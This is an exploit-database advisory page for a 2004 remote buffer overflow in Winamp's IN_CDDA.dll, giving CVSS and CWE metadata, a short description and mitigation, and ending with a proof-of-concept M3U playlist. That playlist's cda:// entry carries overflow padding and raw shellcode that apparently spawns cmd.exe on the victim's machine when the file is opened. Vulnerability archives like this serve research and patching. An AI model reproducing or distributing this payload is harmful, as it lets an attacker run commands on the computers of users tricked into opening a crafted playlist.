Nullsoft Winamp IN_CDDA.dll Remote Buffer Overflow Vulnerability

vendor:

Winamp

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Buffer Overflow

119

CWE

Product Name: Winamp

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2004

Nullsoft Winamp IN_CDDA.dll Remote Buffer Overflow Vulnerability

A remote buffer overflow vulnerability affects the IN_CDDA.dll library of Nullsoft's Winamp. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers. An attacker may distribute malicious play-list files and entice unsuspecting users to process them with the affected application.

Mitigation:

Ensure that all user-supplied input is properly validated before being used.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12381/info

A remote buffer overflow vulnerability affects the IN_CDDA.dll library of Nullsoft's Winamp. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers. It should be noted that this issue is not related to the issue outlined in BID 11730 (Nullsoft Winamp IN_CDDA.dll Remote Buffer Overflow Vulnerability).

This issue will facilitate remote exploitation as an attacker may distribute malicious play-list files and entice unsuspecting users to process them with the affected application.

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]øSÿÐ